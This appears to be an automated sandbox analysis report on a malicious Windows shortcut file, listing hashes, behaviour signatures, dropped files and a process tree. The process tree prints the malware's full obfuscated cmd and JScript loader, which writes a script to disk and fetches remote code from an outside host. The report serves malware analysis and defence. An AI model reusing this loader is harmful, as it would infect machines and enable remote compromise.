
Analysis

  • max time kernel: 145s
  • max time network: 152s
  • platform: windows10-2004_x64
  • resource: win10v2004-20231215-en
  • resource tags: arch:x64, arch:x86, image:win10v2004-20231215-en, locale:en-us, os:windows10-2004-x64, system
  • submitted: 03/02/2024, 16:22

General

  • Target: CFe_SAT_235423272324734.lnk
  • Size: 1KB
  • MD5: cbcc37aa507139d8408fc4e9ede5aca1
  • SHA1: 31ff032fdc43f66e9176109c6d989f5f59a2db0b
  • SHA256: 12491594bf58f4404bd3cf95ac334023e344421b77643d378438fce6bbbc7850
  • SHA512: e70bf846dddb647043054d45aeb6d7dfc1af9976ce62dc5d95a62cd93e2e207c49cc41a197d39dc612c4c4f4692ba2821a2fbb41a7103a6b30e3e24ad378c380

Score: 8/10

Malware Config

Signatures

  • Blocklisted process makes network request (3 IoCs)
  • Checks computer location settings (2 TTPs, 2 IoCs)
    Looks up country code configured in the registry, likely geofence.
  • Enumerates physical storage devices (1 TTPs)
    Attempts to interact with connected storage/optical drive(s).
  • Modifies registry class (1 IoCs)
  • Suspicious use of SetWindowsHookEx (1 IoCs)
  • Suspicious use of WriteProcessMemory (10 IoCs)

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\CFe_SAT_235423272324734.lnk
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4036
    • C:\Windows\System32\conhost.exe
      "C:\Windows\System32\conhost.exe" C:\Windows\system32\cmd.exe /V/D/c "S^eT RXS=C:\CS6MKI\&& mD !RXS!>nul 2>&1&&S^eT IJKP=!RXS!^CGXBTDGK.JS&&<nul set/p TTGG=var TTGG='\u0030\u006e\u0032\u002b\u0044\u0030\u006e\u0032\u002b\u0045\u0030\u006e\u0032\u002b\u0022\u002f\u002f\u0068\u0036\u006f\u0065\u0068\u0072\u002e\u0067\u006c\u006f\u0062\u0061\u006c\u006e\u0065\u0074\u0077\u006f\u0072\u006b\u002e\u006d\u0079\u002e\u0069\u0064\u002f\u003f\u0031\u002f\u0022\u0029\u003b';RXS='\u003a\u0068\u0022\u003b\u0045\u0030\u006e\u0032\u003d\u0022\u0054\u0074\u0022\u002b\u0022\u0050\u003a\u0022\u003b\u0047\u0065\u0074\u004f\u0062\u006a\u0065\u0063\u0074\u0028\u0043';CGXB='\u0076\u0061\u0072\u0020\u0043\u0030\u006e\u0032\u003d\u0022\u0073\u0022\u002b\u0022\u0063\u0072\u0022\u003b\u0044\u0030\u006e\u0032\u003d\u0022\u0069\u0070\u0074\u0022\u002b\u0022';IJKP=CGXB+RXS+TTGG;TDGK=new Function(IJKP);TDGK(); >!IJKP!|caLl !IJKP!||caLl !IJKP! "
      2⤵
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:4540
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /V/D/c "S^eT RXS=C:\CS6MKI\&& mD !RXS!>nul 2>&1&&S^eT IJKP=!RXS!^CGXBTDGK.JS&&<nul set/p TTGG=var TTGG='\u0030\u006e\u0032\u002b\u0044\u0030\u006e\u0032\u002b\u0045\u0030\u006e\u0032\u002b\u0022\u002f\u002f\u0068\u0036\u006f\u0065\u0068\u0072\u002e\u0067\u006c\u006f\u0062\u0061\u006c\u006e\u0065\u0074\u0077\u006f\u0072\u006b\u002e\u006d\u0079\u002e\u0069\u0064\u002f\u003f\u0031\u002f\u0022\u0029\u003b';RXS='\u003a\u0068\u0022\u003b\u0045\u0030\u006e\u0032\u003d\u0022\u0054\u0074\u0022\u002b\u0022\u0050\u003a\u0022\u003b\u0047\u0065\u0074\u004f\u0062\u006a\u0065\u0063\u0074\u0028\u0043';CGXB='\u0076\u0061\u0072\u0020\u0043\u0030\u006e\u0032\u003d\u0022\u0073\u0022\u002b\u0022\u0063\u0072\u0022\u003b\u0044\u0030\u006e\u0032\u003d\u0022\u0069\u0070\u0074\u0022\u002b\u0022';IJKP=CGXB+RXS+TTGG;TDGK=new Function(IJKP);TDGK(); >!IJKP!|caLl !IJKP!||caLl !IJKP! "
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1988
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" set/p TTGG=var TTGG='\u0030\u006e\u0032\u002b\u0044\u0030\u006e\u0032\u002b\u0045\u0030\u006e\u0032\u002b\u0022\u002f\u002f\u0068\u0036\u006f\u0065\u0068\u0072\u002e\u0067\u006c\u006f\u0062\u0061\u006c\u006e\u0065\u0074\u0077\u006f\u0072\u006b\u002e\u006d\u0079\u002e\u0069\u0064\u002f\u003f\u0031\u002f\u0022\u0029\u003b';RXS='\u003a\u0068\u0022\u003b\u0045\u0030\u006e\u0032\u003d\u0022\u0054\u0074\u0022\u002b\u0022\u0050\u003a\u0022\u003b\u0047\u0065\u0074\u004f\u0062\u006a\u0065\u0063\u0074\u0028\u0043';CGXB='\u0076\u0061\u0072\u0020\u0043\u0030\u006e\u0032\u003d\u0022\u0073\u0022\u002b\u0022\u0063\u0072\u0022\u003b\u0044\u0030\u006e\u0032\u003d\u0022\u0069\u0070\u0074\u0022\u002b\u0022';IJKP=CGXB+RXS+TTGG;TDGK=new Function(IJKP);TDGK(); 0<nul 1>C:\CS6MKI\CGXBTDGK.JS"
          4⤵
            PID:1616
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /S /D /c" caLl C:\CS6MKI\CGXBTDGK.JS"
            4⤵
            • Checks computer location settings
            • Modifies registry class
            • Suspicious use of WriteProcessMemory
            PID:4312
            • C:\Windows\System32\WScript.exe
              "C:\Windows\System32\WScript.exe" "C:\CS6MKI\CGXBTDGK.JS"
              5⤵
              • Blocklisted process makes network request
              PID:1268

Network

MITRE ATT&CK Enterprise v15


Downloads

  • C:\CS6MKI\CGXBTDGK.JS
    Filesize: 738B
    MD5: 3f785dedebc8f7c6fc6b03378b626143
    SHA1: 1029599fe33bae01eb197f1d9a32ec8cd17b1716
    SHA256: 69bd87bd8adaa45817861cb4136b787de08676bac75ae1b5be7f47707117a5d7
    SHA512: 526016ea4c1554531a89cd5f44fcf2f4190088cf13b2251417729c27c1b5d60a4aef78ae20b3d13b55ef11dbbee8261ba3009afd2e49f97b832f73c2c76e18f3

  • C:\Users\Admin\AppData\Local\Temp\CFe_SAT_235423272324734.lnk
    Filesize: 2KB
    MD5: 1ccc0ed9b24b6248ce6662e06fb2900e
    SHA1: 108dfac2af6cc79e3e94641f798bc4d47a1f02fa
    SHA256: e03acadc0816ba781b709ca1675b03c82abfbe0f164b84a3e5e6268b2c7106c1
    SHA512: a5574b167a090c7e2fd9b9b4d6629b16220119ac1a32776dc2597b51c70264b99568412cc7b704d0880a3f572fd207253247b4e76dd44b20db70bbfe30060ed8